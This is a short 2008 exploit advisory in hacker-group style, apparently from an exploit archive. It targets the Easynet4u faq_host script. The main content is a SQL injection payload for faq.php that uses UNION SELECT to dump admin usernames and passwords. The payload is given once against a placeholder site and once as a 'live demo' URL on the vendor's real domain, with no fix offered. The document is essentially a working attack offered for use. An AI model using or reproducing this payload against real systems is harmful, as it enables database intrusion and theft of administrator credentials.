Easynet4u faq Host (faq.php faq) Remote SQL Injection Vulnerability

2008-10-10 22:01:09

#### # # ###### ##########
# # # # # # #
#### # # # # ######### # #
# # # ##### ######### # #
# # # # # ## ##########
#### ###### #######
############### >>> Remote SQL Injection <<< #########
## CoNsTaNtiNe HaCkErS25 ##
################## >>> SuB-ZeRo <<< ################
author : SuB-ZeRo(AlGeRiA-HaCkErS)
contact : [email protected]
homepage: www.no-exploit.com
script : faq_host script
download: http://www.easynet4u.com/easyshop/index.php?do=catalog&c=remotely_hosted_scripts&i=faq_host
dork : find it
exploit:
www.site.me/script/faq.php?faq=1+union+select+1,2,concat(username,0x3a,password),4,5,6+from+admin--
L!Ve DeMo
http://www.easynet4u.com/faqs/faq.php?faq=1+union+select+1,2,concat(username,0x3a,password),4,5,6+from+admin--

########### Greetz #############
>>> SuB-ZeRo
>>>my best freinds :: x.CJP.X & ach2008 & carlos the jackel & crazy-zero & bibi-info & HiSoK4
>>> all muslims

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.